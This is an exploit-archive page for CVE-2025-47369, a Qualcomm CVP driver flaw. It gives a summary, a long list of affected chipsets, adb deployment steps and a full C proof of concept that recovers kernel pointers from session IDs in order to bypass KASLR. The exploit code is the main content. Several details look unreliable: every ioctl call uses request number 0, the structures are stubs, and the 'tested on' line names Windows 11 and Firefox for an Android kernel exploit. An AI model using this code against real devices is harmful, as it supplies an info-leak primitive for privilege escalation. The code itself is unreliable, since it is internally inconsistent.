📄 Qualcomm CVP Kernel Pointer Leak

🗓️ 28 Jan 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 166 Views

Qualcomm CVP leaks kernel pointers with a non-cryptographic hash, enabling unfolding and KASLR bypass.

Reporter	Title	Published	Views	Family All 10
Circl	CVE-2025-47369	7 Jan 202600:39	–	circl
CNNVD	Qualcomm Chipsets 安全漏洞	7 Jan 202600:00	–	cnnvd
CVE	CVE-2025-47369	6 Jan 202622:48	–	cve
Cvelist	CVE-2025-47369 Information Exposure in Computer Vision	6 Jan 202622:48	–	cvelist
EUVD	EUVD-2026-1259	7 Jan 202612:31	–	euvd
NVD	CVE-2025-47369	7 Jan 202612:17	–	nvd
Packet Storm	📄 Qualcomm CVP Kernel Driver Pointer Disclosure / Privilege Escalation	17 Feb 202600:00	–	packetstorm
Positive Technologies	PT-2026-1540	6 Jan 202600:00	–	ptsecurity
RedhatCVE	CVE-2025-47369	8 Jan 202603:14	–	redhatcve
Vulnrichment	CVE-2025-47369 Information Exposure in Computer Vision	6 Jan 202622:48	–	vulnrichment

=============================================================================================================================================
    | # Title     : Kernel Pointer Leak via CVP Driver                                                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html                               |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/213733/ & 	CVE-2025-47369
    
    [+] Summary    : The Qualcomm CVP driver exposes kernel pointers to userland by returning a “hashed” session ID derived from a kernel pointer using hash32_ptr(). 
                     This function is not a cryptographic hash but a reversible fold that XORs the upper and lower 32 bits of the pointer. 
    				 Due to predictable ARM64 kernel virtual address layout and alignment constraints, the session ID can be deterministically “unfolded” to recover the original kernel pointer. 
    				 This design flaw results in a reliable kernel pointer leak, effectively bypassing KASLR and providing a strong info‑leak primitive that can be chained with other vulnerabilities. 
                     The issue is tracked as CVE‑2025‑47369 and stems from improper use of pointer-derived identifiers rather than an implementation bug.
    
    [+] Affected Chipsets : AR8035, AR9380, CSR8811, FastConnect 6200, FastConnect 6700, FastConnect 6900, FastConnect 7800, Immersive Home 214 Platform, 
                            Immersive Home 216 Platform, Immersive Home 316 Platform, Immersive Home 318 Platform, IPQ4018, IPQ4019, IPQ4028, IPQ4029, IPQ5010, 
    						IPQ5028, IPQ6000, IPQ6010, IPQ6018, IPQ6028, IPQ8064, IPQ8065, IPQ8068, IPQ8070, IPQ8070A, IPQ8071, IPQ8071A, IPQ8072, IPQ8072A, 
    						IPQ8074, IPQ8074A, IPQ8076, IPQ8076A, IPQ8078, IPQ8078A, IPQ8173, IPQ8174, QAM8255P, QAM8295P, QAM8620P, QAM8650P, QAM8775P, QAMSRV1H, 
    						QAMSRV1M, QCA4024, QCA6174A, QCA6428, QCA6438, QCA6574, QCA6574A, QCA6574AU, QCA6584AU, QCA6595, QCA6595AU, QCA6678AQ, QCA6688AQ, 
    						QCA6696, QCA6698AQ, QCA6797AQ, QCA7500, QCA8075, QCA8081, QCA8337, QCA9880, QCA9886, QCA9888, QCA9889, QCA9898, QCA9980, QCA9984, 
    						QCA9985, QCA9986, QCA9990, QCA9992, QCA9994, QCC710, QCM5430, QCM6490, QCN5022, QCN5024, QCN5052, QCN5122, QCN5124, QCN5152, QCN5154, 
    						QCN5164, QCN6023, QCN6024, QCN6112, QCN6122, QCN6132, QCN6224, QCN6274, QCN9000, QCN9022, QCN9024, QCN9070, QCN9072, QCN9074, QCN9100, 
    						QCN9274, QCS5430, QCS615, QCS6490, QCS9100, QEP8111, QFW7114, QFW7124, QMP1000, Qualcommr Video Collaboration VC3 Platform, SA6145P, 
    						SA6150P, SA6155P, SA7255P, SA7775P, SA8145P, SA8150P, SA8155P, SA8195P, SA8255P, SA8295P, SA8540P, SA8620P, SA8650P, SA8770P, SA8775P, 
    						SA9000P, SC8380XP, SDX55, SM4635, SM6475, SM6650, SM6650P, SM7435, SM7635, SM7635P, SM7675, SM7675P, SM8635, SM8635P, SM8650Q, SM8735, 
    						SM8750, SM8750P, Snapdragon 4 Gen 2 Mobile Platform, Snapdragon 6 Gen 1 Mobile Platform, Snapdragon 8 Gen 3 Mobile Platform, Snapdragon 
    						AR1 Gen 1 Platform, Snapdragon AR1 Gen 1 Platform "Luna1", Snapdragon Auto 5G Modem-RF Gen 2, Snapdragon X32 5G Modem-RF System, 
    						Snapdragon X35 5G Modem-RF System, Snapdragon X72 5G Modem-RF System, Snapdragon X75 5G Modem-RF System, SRV1H, SRV1L, SRV1M, SXR2330P, 
    						SXR2350P, WCD9340, WCD9370, WCD9375, WCD9378, WCD9380, WCD9385, WCD9390, WCD9395, 
                            WCN3950, WCN3988, WCN6650, WCN6755, WCN7750, WCN7860, WCN7861, WCN7880, WCN7881, 
    						WSA8810, WSA8815, WSA8830, WSA8832, WSA8835, WSA8840, WSA8845, WSA8845H
    [+] Usage :
    
    # 1. Compile the POC : gcc -o cvp_exploit cvp_exploit.c -static
    
    # 2. Upload the file to the machine : adb push cvp_exploit /data/local/tmp/
    
    # 3. Run the exploit :
    
    adb shell
    cd /data/local/tmp
    chmod +x cvp_exploit
    ./cvp_exploit
    
    [+] POC :
    
    #include <fcntl.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <sys/ioctl.h>
    #include <stdint.h>
    
    #define EVA_KMD_SESSION_CONTROL 1
    #define EVA_KMD_GET_SESSION_INFO 2
    #define SESSION_CREATE 1
    
    struct session_ctrl_data {
        int ctrl_type;
    
    };
    
    struct session_info_data {
        unsigned int session_id;
    
    };
    
    struct eva_kmd_arg {
        int type;
        union {
            struct session_ctrl_data session_ctrl;
            struct session_info_data session;
    
        } data;
    };
    
    unsigned long unfold_pointer(unsigned int session_id) {
    
    
        unsigned char bottom_byte = (session_id & 0xf) | 0x80;
    
        unsigned long top_half = 0xffffff00UL | bottom_byte;
    
        unsigned long bottom_half = session_id ^ (top_half & 0xffffffff);
    
        unsigned long kernel_ptr = (top_half << 32) | bottom_half;
        
        return kernel_ptr;
    }
    
    int is_valid_kernel_pointer(unsigned long ptr) {
    
        if ((ptr >> 63) == 1) {
            return 1;
        }
    
        if ((ptr >> 48) == 0xffffff) {
            return 1;
        }
        
        return 0;
    }
    
    int main(int argc, char *argv[]) {
        printf("CVE-2025-47369 POC - Kernel Pointer Leak via CVP Driver by indoushka\n");
        printf("=====================================================================\n");
    
        int fd = open("/dev/cvp", O_RDWR);
        if (fd == -1) {
            perror("Failed to open /dev/cvp");
            printf("Make sure device exists and permissions are correct\n");
            return EXIT_FAILURE;
        }
        printf("[+] Opened /dev/cvp (fd=%d)\n", fd);
        
    
        int num_sessions = 3;
        unsigned long pointers[num_sessions];
        
        for (int i = 0; i < num_sessions; i++) {
    
            struct eva_kmd_arg create_arg = {
                .type = EVA_KMD_SESSION_CONTROL,
                .data.session_ctrl.ctrl_type = SESSION_CREATE,
            };
            
            if (ioctl(fd, 0, &create_arg) < 0) {
                perror("Failed to create session");
                close(fd);
                return EXIT_FAILURE;
            }
    
            struct eva_kmd_arg info_arg = {
                .type = EVA_KMD_GET_SESSION_INFO,
                .data.session.session_id = 0
            };
            
            if (ioctl(fd, 0, &info_arg) < 0) {
                perror("Failed to get session info");
                close(fd);
                return EXIT_FAILURE;
            }
            
            unsigned int session_id = info_arg.data.session.session_id;
            printf("[+] Session %d created - session_id: 0x%08x\n", 
                   i + 1, session_id);
    
            unsigned long kernel_ptr = unfold_pointer(session_id);
            pointers[i] = kernel_ptr;
    
            if (is_valid_kernel_pointer(kernel_ptr)) {
                printf("    [+] Leaked kernel pointer: 0x%016lx\n", kernel_ptr);
    
                printf("    [+] Pointer analysis:\n");
                printf("        - Upper 32 bits: 0x%08lx\n", kernel_ptr >> 32);
                printf("        - Lower 32 bits: 0x%08lx\n", kernel_ptr & 0xffffffff);
                printf("        - XOR result: 0x%08x\n", 
                       (unsigned int)((kernel_ptr >> 32) ^ (kernel_ptr & 0xffffffff)));
            } else {
                printf("    [-] Invalid/unexpected pointer format: 0x%016lx\n", 
                       kernel_ptr);
            }
            
            printf("\n");
        }
    
        printf("[+] Pattern Analysis:\n");
        for (int i = 1; i < num_sessions; i++) {
            long diff = pointers[i] - pointers[i-1];
            printf("    Difference between session %d and %d: %ld bytes (0x%lx)\n",
                   i, i - 1, diff, diff);
        }
    
        printf("\n[+] System Information:\n");
        printf("    Pointer size: %lu bits\n", sizeof(void*) * 8);
        printf("    Long size: %lu bits\n", sizeof(unsigned long) * 8);
        
        close(fd);
        printf("[+] Exploit completed successfully\n");
        
        return EXIT_SUCCESS;
    }
    
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================

28 Jan 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8

CVSS 3.15.5

EPSS0.00017

SSVC